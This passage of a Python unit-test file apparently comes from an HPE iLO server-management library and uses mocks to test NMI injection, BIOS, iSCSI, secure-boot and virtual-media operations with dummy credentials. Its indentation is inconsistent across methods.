@mock.patch.object(ris.RISOperations, 'get_host_power_status')
def test_inject_nmi(self, get_power_status_mock,
perform_power_op_mock):
get_power_status_mock.return_value = 'ON'
self.client.inject_nmi()
get_power_status_mock.assert_called_once_with()
perform_power_op_mock.assert_called_once_with('Nmi')
@mock.patch.object(ris.RISOperations, '_perform_power_op')
@mock.patch.object(ris.RISOperations, 'get_host_power_status')
def test_inject_nmi_exc(self, get_power_status_mock,
perform_power_op_mock):
get_power_status_mock.return_value = 'OFF'
self.assertRaises(exception.IloError,
self.client.inject_nmi)
get_power_status_mock.assert_called_once_with()
self.assertFalse(perform_power_op_mock.called)
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_host_post_state(self, get_details_mock):
host_response = ris_outputs.RESPONSE_BODY_FOR_REST_OP
expected = 'PowerOff'
get_details_mock.return_value = json.loads(host_response)
result = self.client.get_host_post_state()
self.assertEqual(expected, result)
get_details_mock.assert_called_once_with()
    @mock.patch.object(ris.RISOperations, '_get_host_details')
    def test_get_host_post_state_exc(self, get_details_mock):
        """A host-details payload without PostState raises IloError."""
        host_response = json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP)
        get_details_mock.return_value = host_response
        # Deleting after assignment still affects the mock's return value:
        # both names reference the same dict object.
        del host_response['Oem']['Hp']['PostState']
        self.assertRaises(exception.IloError,
                          self.client.get_host_post_state)
        get_details_mock.assert_called_once_with()
    @mock.patch.object(ris.RISOperations, '_check_bios_resource')
    def test_get_current_bios_settings_filter_true(self, check_bios_mock):
        """With filtering on, only supported BIOS properties are returned."""
        bios_uri = '/rest/v1/systems/1/bios'
        settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
        check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
                                        bios_uri, settings)
        # Popping after the return_value assignment still affects the mock:
        # the tuple holds a reference to the same dict.
        settings.pop("links", None)
        expected_value = {k: settings[k] for k in (
            constants.SUPPORTED_BIOS_PROPERTIES) if k in settings}
        actual_value = self.client.get_current_bios_settings(True)
        check_bios_mock.assert_called_once_with()
        self.assertEqual(actual_value, expected_value)
    @mock.patch.object(utils, 'apply_bios_properties_filter')
    @mock.patch.object(ris.RISOperations, '_check_bios_resource')
    def test_get_current_bios_settings_filter_false(self, check_bios_mock,
                                                    bios_filter_mock):
        """With filtering off, the raw settings are returned unfiltered."""
        bios_uri = '/rest/v1/systems/1/bios'
        settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
        check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
                                        bios_uri, settings)
        settings.pop("links", None)
        actual_value = self.client.get_current_bios_settings(False)
        check_bios_mock.assert_called_once_with()
        bios_filter_mock.assert_not_called()
        self.assertEqual(actual_value, settings)
    @mock.patch.object(ris.RISOperations, '_check_bios_resource')
    def test_get_pending_bios_settings_no_links(self, check_bios_mock):
        """Missing 'links' in the BIOS resource means pending not supported."""
        bios_uri = '/rest/v1/systems/1/bios'
        settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
        # Strip the links section before wiring the mock so the client
        # cannot locate the pending-settings URI.
        settings.pop("links", None)
        check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
                                        bios_uri, settings)
        self.assertRaises(exception.IloCommandNotSupportedError,
                          self.client.get_pending_bios_settings, False)
        check_bios_mock.assert_called_once_with()
    @mock.patch.object(ris.RISOperations, '_get_extended_error')
    @mock.patch.object(ris.RISOperations, '_rest_get')
    @mock.patch.object(ris.RISOperations, '_check_bios_resource')
    def test_get_pending_bios_settings_filter_true(self, check_bios_mock,
                                                   get_mock, get_ext_mock):
        """Filtered pending settings keep only the supported properties."""
        bios_uri = '/rest/v1/systems/1/bios'
        settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
        check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
                                        bios_uri, settings)
        settings_uri = "/rest/v1/systems/1/bios/Settings"
        pending_settings = json.loads(ris_outputs.GET_BIOS_PENDING_SETTINGS)
        pending_settings.pop("Description", None)
        get_mock.return_value = (200, ris_outputs.GET_HEADERS,
                                 pending_settings)
        expected_value = {k: pending_settings[k] for k in (
            constants.SUPPORTED_BIOS_PROPERTIES) if k in pending_settings}
        actual_value = self.client.get_pending_bios_settings(True)
        self.assertEqual(actual_value, expected_value)
        get_mock.assert_called_once_with(settings_uri)
        check_bios_mock.assert_called_once_with()
    @mock.patch.object(utils, 'apply_bios_properties_filter')
    @mock.patch.object(ris.RISOperations, '_get_extended_error')
    @mock.patch.object(ris.RISOperations, '_rest_get')
    @mock.patch.object(ris.RISOperations, '_check_bios_resource')
    def test_get_pending_bios_settings_filter_false(self, check_bios_mock,
                                                    get_mock, get_ext_mock,
                                                    bios_filter_mock):
        """Unfiltered pending settings are returned exactly as fetched."""
        bios_uri = '/rest/v1/systems/1/bios'
        settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
        check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
                                        bios_uri, settings)
        settings_uri = "/rest/v1/systems/1/bios/Settings"
        pending_settings = json.loads(ris_outputs.GET_BIOS_PENDING_SETTINGS)
        get_mock.return_value = (200, ris_outputs.GET_HEADERS,
                                 pending_settings)
        actual_value = self.client.get_pending_bios_settings(False)
        self.assertEqual(actual_value, pending_settings)
        get_mock.assert_called_once_with(settings_uri)
        check_bios_mock.assert_called_once_with()
        bios_filter_mock.assert_not_called()
    @mock.patch.object(ris.RISOperations, '_rest_get')
    @mock.patch.object(ris.RISOperations, '_check_bios_resource')
    def test_get_default_bios_settings_filter_true(self, check_bios_mock,
                                                   rest_get_mock):
        """Defaults come from BaseConfigs; filtering keeps supported keys."""
        bios_uri = '/rest/v1/systems/1/bios'
        settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
        check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
                                        bios_uri, settings)
        base_config = json.loads(ris_outputs.GET_BASE_CONFIG)
        rest_get_mock.return_value = (200, 'HEADERS', base_config)
        # Locate the 'default' entry the implementation is expected to pick.
        default_settings = None
        for cfg in base_config['BaseConfigs']:
            default_settings = cfg.get('default', None)
            if default_settings is not None:
                break
        expected_value = {k: default_settings[k] for k in (
            constants.SUPPORTED_BIOS_PROPERTIES) if k in default_settings}
        actual_value = self.client.get_default_bios_settings(True)
        check_bios_mock.assert_called_once_with()
        rest_get_mock.assert_called_once_with(
            "/rest/v1/systems/1/bios/BaseConfigs")
        self.assertEqual(expected_value, actual_value)
    @mock.patch.object(utils, 'apply_bios_properties_filter')
    @mock.patch.object(ris.RISOperations, '_rest_get')
    @mock.patch.object(ris.RISOperations, '_check_bios_resource')
    def test_get_default_bios_settings_filter_false(
            self, check_bios_mock, rest_get_mock, filter_mock):
        """Unfiltered defaults are the raw 'default' BaseConfigs entry."""
        bios_uri = '/rest/v1/systems/1/bios'
        settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
        check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
                                        bios_uri, settings)
        base_config = json.loads(ris_outputs.GET_BASE_CONFIG)
        rest_get_mock.return_value = (200, 'HEADERS', base_config)
        # Locate the 'default' entry the implementation is expected to pick.
        default_settings = None
        for cfg in base_config['BaseConfigs']:
            default_settings = cfg.get('default', None)
            if default_settings is not None:
                break
        expected_value = default_settings
        actual_value = self.client.get_default_bios_settings(False)
        check_bios_mock.assert_called_once_with()
        rest_get_mock.assert_called_once_with(
            "/rest/v1/systems/1/bios/BaseConfigs")
        self.assertEqual(expected_value, actual_value)
        filter_mock.assert_not_called()
    @mock.patch.object(ris.RISOperations, '_check_bios_resource')
    def test_get_default_bios_settings_no_links(self, check_bios_mock):
        """Missing 'links' in the BIOS resource means defaults unsupported."""
        bios_uri = '/rest/v1/systems/1/bios'
        settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
        check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
                                        bios_uri, settings)
        # Popping after wiring still affects the mock (shared dict object).
        settings.pop("links", None)
        self.assertRaises(exception.IloCommandNotSupportedError,
                          self.client.get_default_bios_settings, False)
        check_bios_mock.assert_called_once_with()
    @mock.patch.object(ris.RISOperations, '_get_extended_error')
    @mock.patch.object(ris.RISOperations, '_rest_get')
    @mock.patch.object(ris.RISOperations, '_check_bios_resource')
    def test_get_default_bios_settings_check_extended_error(
            self, check_bios_mock, rest_get_mock, ext_err_mock):
        """A non-200 BaseConfigs GET raises and reports the extended error."""
        bios_uri = '/rest/v1/systems/1/bios'
        settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
        check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
                                        bios_uri, settings)
        base_config = json.loads(ris_outputs.GET_BASE_CONFIG)
        rest_get_mock.return_value = (201, 'HEADERS', base_config)
        self.assertRaises(exception.IloError,
                          self.client.get_default_bios_settings, False)
        check_bios_mock.assert_called_once_with()
        ext_err_mock.assert_called_once_with(base_config)
    @mock.patch.object(utils, 'apply_bios_properties_filter')
    @mock.patch.object(ris.RISOperations, '_get_extended_error')
    @mock.patch.object(ris.RISOperations, '_rest_get')
    @mock.patch.object(ris.RISOperations, '_check_bios_resource')
    def test_get_default_bios_settings_no_default_settings(
            self, check_bios_mock, rest_get_mock, ext_err_mock, filter_mock):
        """BaseConfigs without a 'default' entry means defaults unsupported."""
        bios_uri = '/rest/v1/systems/1/bios'
        settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
        check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
                                        bios_uri, settings)
        base_config = json.loads(ris_outputs.GET_BASE_CONFIG)
        # Rename the 'default' key so the lookup inside the client fails.
        default_val = base_config["BaseConfigs"][0].pop("default")
        base_config["BaseConfigs"][0]["no_default"] = default_val
        rest_get_mock.return_value = (200, 'HEADERS', base_config)
        self.assertRaises(exception.IloCommandNotSupportedError,
                          self.client.get_default_bios_settings, False)
        check_bios_mock.assert_called_once_with()
        ext_err_mock.assert_not_called()
        filter_mock.assert_not_called()
@mock.patch.object(utils, 'apply_bios_properties_filter')
@mock.patch.object(ris.RISOperations, '_change_bios_setting')
def test_set_bios_settings_no_data_apply_filter(self, change_bios_mock,
filter_mock):
apply_filter = True
data = None
self.client.set_bios_settings(data, apply_filter)
change_bios_mock.assert_not_called()
filter_mock.assert_not_called()
@mock.patch.object(utils, 'apply_bios_properties_filter')
@mock.patch.object(ris.RISOperations, '_change_bios_setting')
def test_set_bios_settings_no_data_no_filter(self, change_bios_mock,
filter_mock):
apply_filter = False
data = None
self.client.set_bios_settings(data, apply_filter)
change_bios_mock.assert_not_called()
filter_mock.assert_not_called()
    @mock.patch.object(utils, 'apply_bios_properties_filter')
    @mock.patch.object(ris.RISOperations, '_change_bios_setting')
    def test_set_bios_settings_filter_true(self, change_bios_mock,
                                           filter_mock):
        """With filtering on, only the filtered subset is applied."""
        data = {
            "AdminName": "Administrator",
            "BootMode": "LEGACY",
            "ServerName": "Gen9 server",
            "TimeFormat": "Ist",
            "BootOrderPolicy": "RetryIndefinitely",
            "ChannelInterleaving": "Enabled",
            "CollabPowerControl": "Enabled",
            "ConsistentDevNaming": "LomsOnly",
            "CustomPostMessage": ""
        }
        # Subset the filter mock is wired to return; the client must apply
        # exactly this, not the full input dict.
        expected = {
            "AdminName": "Administrator",
            "BootMode": "LEGACY",
            "ServerName": "Gen9 server",
            "TimeFormat": "Ist",
            "BootOrderPolicy": "RetryIndefinitely",
        }
        filter_mock.return_value = expected
        apply_filter = True
        self.client.set_bios_settings(data, apply_filter)
        change_bios_mock.assert_called_once_with(expected)
        filter_mock.assert_called_once_with(
            data, constants.SUPPORTED_BIOS_PROPERTIES)
    @mock.patch.object(utils, 'apply_bios_properties_filter')
    @mock.patch.object(ris.RISOperations, '_change_bios_setting')
    def test_set_bios_settings_filter_false(self, change_bios_mock,
                                            filter_mock):
        """With filtering off, the input data is applied verbatim."""
        data = {
            "AdminName": "Administrator",
            "BootMode": "LEGACY",
            "ServerName": "Gen9 server",
            "TimeFormat": "Ist",
            "BootOrderPolicy": "RetryIndefinitely",
            "ChannelInterleaving": "Enabled",
            "CollabPowerControl": "Enabled",
            "ConsistentDevNaming": "LomsOnly",
            "CustomPostMessage": ""
        }
        apply_filter = False
        self.client.set_bios_settings(data, apply_filter)
        change_bios_mock.assert_called_once_with(data)
        filter_mock.assert_not_called()
class TestRISOperationsPrivateMethods(testtools.TestCase):
    def setUp(self):
        """Create a RISOperations client against dummy iLO credentials."""
        super(TestRISOperationsPrivateMethods, self).setUp()
        self.client = ris.RISOperations("1.2.3.4", "admin", "Admin")
@mock.patch.object(ris.RISOperations, 'get_current_boot_mode')
def test__is_boot_mode_uefi_uefi(self, get_current_boot_mode_mock):
get_current_boot_mode_mock.return_value = 'UEFI'
result = self.client._is_boot_mode_uefi()
self.assertTrue(result)
@mock.patch.object(ris.RISOperations, 'get_current_boot_mode')
def test__is_boot_mode_uefi_bios(self, get_current_boot_mode_mock):
get_current_boot_mode_mock.return_value = 'LEGACY'
result = self.client._is_boot_mode_uefi()
self.assertFalse(result)
    @mock.patch.object(ris.RISOperations, '_rest_patch')
    @mock.patch.object(ris.RISOperations, '_check_bios_resource')
    def test___change_bios_setting(self, check_bios_mock, patch_mock):
        """A BIOS property change is PATCHed to the BIOS resource URI."""
        bios_uri = '/rest/v1/systems/1/bios'
        properties = {'fake-property': 'fake-value'}
        settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
        check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
                                        bios_uri, settings)
        patch_mock.return_value = (200, ris_outputs.GET_HEADERS,
                                   ris_outputs.REST_POST_RESPONSE)
        self.client._change_bios_setting(properties)
        check_bios_mock.assert_called_once_with(properties.keys())
        patch_mock.assert_called_once_with(bios_uri, {}, properties)
    @mock.patch.object(ris.RISOperations, '_validate_if_patch_supported')
    @mock.patch.object(ris.RISOperations, '_operation_allowed')
    @mock.patch.object(ris.RISOperations, '_get_bios_settings_resource')
    @mock.patch.object(ris.RISOperations, '_rest_patch')
    @mock.patch.object(ris.RISOperations, '_check_bios_resource')
    def test___change_bios_setting_fail(self, check_bios_mock, patch_mock,
                                        settings_mock, op_mock,
                                        validate_mock):
        """A failed PATCH (non-2xx) while changing BIOS settings raises."""
        bios_uri = '/rest/v1/systems/1/bios/Settings'
        properties = {'fake-property': 'fake-value'}
        settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
        # PATCH not allowed on the main resource, so the client falls back
        # to the settings resource before PATCHing.
        op_mock.return_value = False
        settings_mock.return_value = (ris_outputs.GET_HEADERS,
                                      bios_uri, settings)
        check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
                                        bios_uri, settings)
        patch_mock.return_value = (301, ris_outputs.GET_HEADERS,
                                   ris_outputs.REST_POST_RESPONSE)
        self.assertRaises(exception.IloError,
                          self.client._change_bios_setting,
                          properties)
        check_bios_mock.assert_called_once_with(properties.keys())
        op_mock.assert_called_once_with(ris_outputs.GET_HEADERS, 'PATCH')
        settings_mock.assert_called_once_with(settings)
        patch_mock.assert_called_once_with(bios_uri, {}, properties)
    @mock.patch.object(ris.RISOperations, '_validate_if_patch_supported')
    @mock.patch.object(ris.RISOperations, '_get_iscsi_settings_resource')
    @mock.patch.object(ris.RISOperations, '_operation_allowed')
    @mock.patch.object(ris.RISOperations, '_rest_get')
    @mock.patch.object(ris.RISOperations, '_check_bios_resource')
    def test__check_iscsi_rest_patch_allowed(self, check_bios_mock, get_mock,
                                             op_mock, settings_mock,
                                             validate_mock):
        """When PATCH is disallowed on iScsi, the Settings sub-resource
        is resolved and validated instead."""
        bios_uri = '/rest/v1/systems/1/bios'
        settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
        check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
                                        bios_uri, settings)
        iscsi_uri = '/rest/v1/systems/1/bios/iScsi'
        iscsi_settings = json.loads(ris_outputs.GET_ISCSI_SETTINGS)
        get_mock.return_value = (200, ris_outputs.GET_HEADERS,
                                 iscsi_settings)
        op_mock.return_value = False
        iscsi_settings_uri = '/rest/v1/systems/1/bios/iScsi/Settings'
        settings_mock.return_value = (ris_outputs.GET_HEADERS,
                                      iscsi_settings_uri, iscsi_settings)
        self.client._check_iscsi_rest_patch_allowed()
        check_bios_mock.assert_called_once_with()
        get_mock.assert_called_once_with(iscsi_uri)
        op_mock.assert_called_once_with(ris_outputs.GET_HEADERS, 'PATCH')
        settings_mock.assert_called_once_with(iscsi_settings)
        validate_mock.assert_called_once_with(ris_outputs.GET_HEADERS,
                                              iscsi_settings_uri)
    @mock.patch.object(ris.RISOperations, '_rest_get')
    @mock.patch.object(ris.RISOperations, '_check_bios_resource')
    def test__check_iscsi_rest_patch_allowed_fail(self, check_bios_mock,
                                                  get_mock):
        """A non-200 status while reading the iScsi resource raises."""
        bios_uri = '/rest/v1/systems/1/bios'
        settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
        check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
                                        bios_uri, settings)
        iscsi_uri = '/rest/v1/systems/1/bios/iScsi'
        iscsi_settings = json.loads(ris_outputs.GET_ISCSI_SETTINGS)
        get_mock.return_value = (202, ris_outputs.GET_HEADERS,
                                 iscsi_settings)
        self.assertRaises(exception.IloError,
                          self.client._check_iscsi_rest_patch_allowed)
        check_bios_mock.assert_called_once_with()
        get_mock.assert_called_once_with(iscsi_uri)
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test__check_iscsi_rest_patch_allowed_not_found(self, check_bios_mock):
bios_uri = '/rest/v1/systems/1/bios'
settings = json.loads(ris_outputs.GET_BASE_CONFIG)
check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
bios_uri, settings)
self.assertRaises(exception.IloCommandNotSupportedError,
self.client._check_iscsi_rest_patch_allowed)
check_bios_mock.assert_called_once_with()
    @mock.patch.object(ris.RISOperations, '_rest_patch')
    @mock.patch.object(ris.RISOperations, '_check_iscsi_rest_patch_allowed')
    @mock.patch.object(ris.RISOperations, '_get_bios_mappings_resource')
    @mock.patch.object(ris.RISOperations, '_check_bios_resource')
    def test__change_iscsi_settings(self, check_bios_mock,
                                    mappings_mock, check_iscsi_mock,
                                    patch_mock):
        """iSCSI properties are PATCHed onto the iScsi Settings resource."""
        bios_uri = '/rest/v1/systems/1/bios'
        bios_settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
        check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
                                        bios_uri, bios_settings)
        map_settings = json.loads(ris_outputs.GET_BIOS_MAPPINGS)
        mappings_mock.return_value = map_settings
        iscsi_uri = '/rest/v1/systems/1/bios/iScsi/Settings'
        properties = {'iSCSITargetName':
                      'iqn.2011-07.com.example.server:test1',
                      'iSCSIBootLUN': '1',
                      'iSCSITargetIpAddress': '10.10.1.30',
                      'iSCSITargetTcpPort': 3260}
        # Expected PATCH body: the fixture with NIC attach points merged in.
        settings = json.loads(ris_outputs.GET_ISCSI_PATCH)
        check_iscsi_mock.return_value = iscsi_uri
        patch_mock.return_value = (200, ris_outputs.GET_HEADERS,
                                   ris_outputs.REST_POST_RESPONSE)
        self.client._change_iscsi_settings(properties)
        check_bios_mock.assert_called_once_with()
        mappings_mock.assert_called_once_with(bios_settings)
        check_iscsi_mock.assert_called_once_with()
        patch_mock.assert_called_once_with(iscsi_uri, None, settings)
    @mock.patch.object(ris.RISOperations, '_get_bios_mappings_resource')
    @mock.patch.object(ris.RISOperations, '_check_bios_resource')
    def test__change_iscsi_settings_without_nic(self, check_bios_mock,
                                                mappings_mock):
        """Mappings lacking any NIC make _change_iscsi_settings raise."""
        bios_uri = '/rest/v1/systems/1/bios'
        bios_settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
        check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
                                        bios_uri, bios_settings)
        map_settings = json.loads(ris_outputs.GET_BIOS_MAPPINGS_WITHOUT_NIC)
        mappings_mock.return_value = map_settings
        self.assertRaises(exception.IloError,
                          self.client._change_iscsi_settings,
                          {})
        check_bios_mock.assert_called_once_with()
        mappings_mock.assert_called_once_with(bios_settings)
    @mock.patch.object(ris.RISOperations, '_rest_patch')
    @mock.patch.object(ris.RISOperations, '_check_iscsi_rest_patch_allowed')
    @mock.patch.object(ris.RISOperations, '_get_bios_mappings_resource')
    @mock.patch.object(ris.RISOperations, '_check_bios_resource')
    def test__change_iscsi_settings_fail(self, check_bios_mock,
                                         mappings_mock, check_iscsi_mock,
                                         patch_mock):
        """A failed PATCH (non-2xx) of iSCSI settings raises IloError."""
        bios_uri = '/rest/v1/systems/1/bios'
        bios_settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
        check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
                                        bios_uri, bios_settings)
        map_settings = json.loads(ris_outputs.GET_BIOS_MAPPINGS)
        mappings_mock.return_value = map_settings
        iscsi_uri = '/rest/v1/systems/1/bios/iScsi/Settings'
        properties = {'iSCSITargetName':
                      'iqn.2011-07.com.example.server:test1',
                      'iSCSIBootLUN': '1',
                      'iSCSITargetIpAddress': '10.10.1.30',
                      'iSCSITargetTcpPort': 3260}
        settings = json.loads(ris_outputs.GET_ISCSI_PATCH)
        check_iscsi_mock.return_value = iscsi_uri
        patch_mock.return_value = (301, ris_outputs.GET_HEADERS,
                                   ris_outputs.REST_POST_RESPONSE)
        self.assertRaises(exception.IloError,
                          self.client._change_iscsi_settings,
                          properties)
        check_bios_mock.assert_called_once_with()
        mappings_mock.assert_called_once_with(bios_settings)
        check_iscsi_mock.assert_called_once_with()
        patch_mock.assert_called_once_with(iscsi_uri, None, settings)
    @mock.patch.object(ris.RISOperations, '_change_bios_setting')
    @mock.patch.object(ris.RISOperations, '_get_bios_setting')
    @mock.patch.object(ris.RISOperations, '_rest_patch')
    @mock.patch.object(ris.RISOperations, '_get_host_details')
    def test___change_secure_boot_settings(self, get_details_mock, patch_mock,
                                           get_bios_mock, change_bios_mock):
        """Secure-boot changes PATCH the SecureBoot URI and then rewrite
        CustomPostMessage (with a trailing space appended) via BIOS."""
        host_details = json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP)
        get_details_mock.return_value = host_details
        get_bios_mock.return_value = "test"
        secure_boot_uri = '/rest/v1/Systems/1/SecureBoot'
        bios_dict = {'CustomPostMessage': 'test '}
        patch_mock.return_value = (200, ris_outputs.GET_HEADERS,
                                   ris_outputs.REST_POST_RESPONSE)
        self.client._change_secure_boot_settings('fake-property',
                                                 'fake-value')
        get_details_mock.assert_called_once_with()
        patch_mock.assert_called_once_with(secure_boot_uri, None,
                                           {'fake-property': 'fake-value'})
        get_bios_mock.assert_called_once_with('CustomPostMessage')
        change_bios_mock.assert_called_once_with(bios_dict)
    @mock.patch.object(ris.RISOperations, '_get_host_details')
    def test___change_secure_boot_settings_not_supported(self,
                                                         get_details_mock):
        """Missing SecureBoot link in host details means not supported."""
        host_response = json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP)
        del host_response['Oem']['Hp']['links']['SecureBoot']
        get_details_mock.return_value = host_response
        self.assertRaises(exception.IloCommandNotSupportedError,
                          self.client._change_secure_boot_settings,
                          'fake-property', 'fake-value')
        get_details_mock.assert_called_once_with()
    @mock.patch.object(ris.RISOperations, '_rest_patch')
    @mock.patch.object(ris.RISOperations, '_get_host_details')
    def test___change_secure_boot_settings_fail(self, get_details_mock,
                                                patch_mock):
        """A failed PATCH (non-2xx) of SecureBoot raises IloError."""
        host_details = json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP)
        get_details_mock.return_value = host_details
        secure_boot_uri = '/rest/v1/Systems/1/SecureBoot'
        patch_mock.return_value = (301, ris_outputs.GET_HEADERS,
                                   ris_outputs.REST_FAILURE_OUTPUT)
        self.assertRaises(exception.IloError,
                          self.client._change_secure_boot_settings,
                          'fake-property', 'fake-value')
        get_details_mock.assert_called_once_with()
        patch_mock.assert_called_once_with(secure_boot_uri, None,
                                           {'fake-property': 'fake-value'})
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test__get_bios_setting(self, bios_mock):
bios_mock.return_value = ('fake', 'fake',
json.loads(ris_outputs.GET_BIOS_SETTINGS))
result = self.client._get_bios_setting('BootMode')
bios_mock.assert_called_once_with(['BootMode'])
self.assertEqual(result, 'Uefi')
@mock.patch.object(ris.RISOperations, '_rest_get')
def test__get_bios_settings_resource(self, get_mock):
settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
get_mock.return_value = (200, ris_outputs.GET_HEADERS,
settings)
self.client._get_bios_settings_resource(settings)
get_mock.assert_called_once_with('/rest/v1/systems/1/bios/Settings')
    @mock.patch.object(ris.RISOperations, '_rest_get')
    def test__get_bios_settings_resource_key_error(self, get_mock):
        """A payload without the settings link raises IloError."""
        settings = json.loads(ris_outputs.GET_BASE_CONFIG)
        self.assertRaises(exception.IloError,
                          self.client._get_bios_settings_resource,
                          settings)
@mock.patch.object(ris.RISOperations, '_rest_get')
def test__get_bios_settings_resource_fail(self, get_mock):
settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
settings_uri = '/rest/v1/systems/1/bios/Settings'
get_mock.return_value = (301, ris_outputs.GET_HEADERS,
settings)
self.assertRaises(exception.IloError,
self.client._get_bios_settings_resource,
settings)
get_mock.assert_called_once_with(settings_uri)
@mock.patch.object(ris.RISOperations, '_rest_get')
def test__get_bios_boot_resource(self, get_mock):
settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
boot_settings = json.loads(ris_outputs.GET_BIOS_BOOT)
get_mock.return_value = (200, ris_outputs.GET_HEADERS,
boot_settings)
self.client._get_bios_boot_resource(settings)
get_mock.assert_called_once_with('/rest/v1/systems/1/bios/Boot')
def test__get_bios_boot_resource_key_error(self):
    """Missing Boot link raises IloCommandNotSupportedError."""
    settings = json.loads(ris_outputs.GET_BASE_CONFIG)
    self.assertRaises(exception.IloCommandNotSupportedError,
                      self.client._get_bios_boot_resource,
                      settings)
@mock.patch.object(ris.RISOperations, '_rest_get')
def test__get_bios_boot_resource_fail(self, get_mock):
    """Non-200 status from the Boot URI raises IloError."""
    settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
    boot_settings = json.loads(ris_outputs.GET_BIOS_BOOT)
    get_mock.return_value = (201, ris_outputs.GET_HEADERS,
                             boot_settings)
    self.assertRaises(exception.IloError,
                      self.client._get_bios_boot_resource,
                      settings)
    get_mock.assert_called_once_with('/rest/v1/systems/1/bios/Boot')
@mock.patch.object(ris.RISOperations, '_rest_get')
def test__get_bios_mappings_resource(self, get_mock):
    """Mappings resource is fetched from the Mappings URI in BIOS settings."""
    settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
    map_settings = json.loads(ris_outputs.GET_BIOS_MAPPINGS)
    get_mock.return_value = (200, ris_outputs.GET_HEADERS,
                             map_settings)
    self.client._get_bios_mappings_resource(settings)
    get_mock.assert_called_once_with('/rest/v1/systems/1/bios/Mappings')
def test__get_bios_mappings_resource_key_error(self):
    """Missing Mappings link raises IloCommandNotSupportedError."""
    settings = json.loads(ris_outputs.GET_BASE_CONFIG)
    self.assertRaises(exception.IloCommandNotSupportedError,
                      self.client._get_bios_mappings_resource,
                      settings)
@mock.patch.object(ris.RISOperations, '_rest_get')
def test__get_bios_mappings_resource_fail(self, get_mock):
    """Non-200 status from the Mappings URI raises IloError."""
    settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
    map_settings = json.loads(ris_outputs.GET_BIOS_MAPPINGS)
    get_mock.return_value = (201, ris_outputs.GET_HEADERS,
                             map_settings)
    self.assertRaises(exception.IloError,
                      self.client._get_bios_mappings_resource,
                      settings)
    get_mock.assert_called_once_with('/rest/v1/systems/1/bios/Mappings')
@mock.patch.object(ris.RISOperations, '_rest_get')
def test__get_iscsi_settings_resource(self, get_mock):
    """iSCSI settings resource is fetched from its Settings URI."""
    settings = json.loads(ris_outputs.GET_ISCSI_SETTINGS)
    get_mock.return_value = (200, ris_outputs.GET_HEADERS, settings)
    self.client._get_iscsi_settings_resource(settings)
    get_mock.assert_called_once_with(
        '/rest/v1/systems/1/bios/iScsi/Settings')
def test__get_iscsi_settings_resource_key_error(self):
    """Missing iSCSI settings link raises IloCommandNotSupportedError."""
    settings = json.loads(ris_outputs.GET_ISCSI_PATCH)
    self.assertRaises(exception.IloCommandNotSupportedError,
                      self.client._get_iscsi_settings_resource,
                      settings)
@mock.patch.object(ris.RISOperations, '_rest_get')
def test__get_iscsi_settings_resource_fail(self, get_mock):
    """Non-200 status from the iSCSI settings URI raises IloError."""
    settings = json.loads(ris_outputs.GET_ISCSI_SETTINGS)
    get_mock.return_value = (201, ris_outputs.GET_HEADERS, settings)
    self.assertRaises(exception.IloError,
                      self.client._get_iscsi_settings_resource,
                      settings)
    get_mock.assert_called_once_with(
        '/rest/v1/systems/1/bios/iScsi/Settings')
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_get_ilo_details')
@mock.patch.object(ris.RISOperations, '_get_collection')
def test__get_vm_device_status(self,
                               collection_mock,
                               ilo_details_mock,
                               get_mock):
    """FLOPPY status is resolved via manager details -> vmedia collection."""
    manager_uri = '/rest/v1/Managers/1'
    manager_data = json.loads(ris_outputs.GET_MANAGER_DETAILS)
    ilo_details_mock.return_value = (manager_data, manager_uri)
    collection_item = json.loads(ris_outputs.RESP_VM_STATUS_FLOPPY_EMPTY)
    vmedia_uri = '/rest/v1/Managers/1/VirtualMedia'
    member_uri = '/rest/v1/Managers/1/VirtualMedia/1'
    collection_mock.return_value = [(200, None, collection_item,
                                     member_uri)]
    get_mock.return_value = (200, ris_outputs.GET_HEADERS,
                             collection_item)
    self.client._get_vm_device_status('FLOPPY')
    ilo_details_mock.assert_called_once_with()
    collection_mock.assert_called_once_with(vmedia_uri)
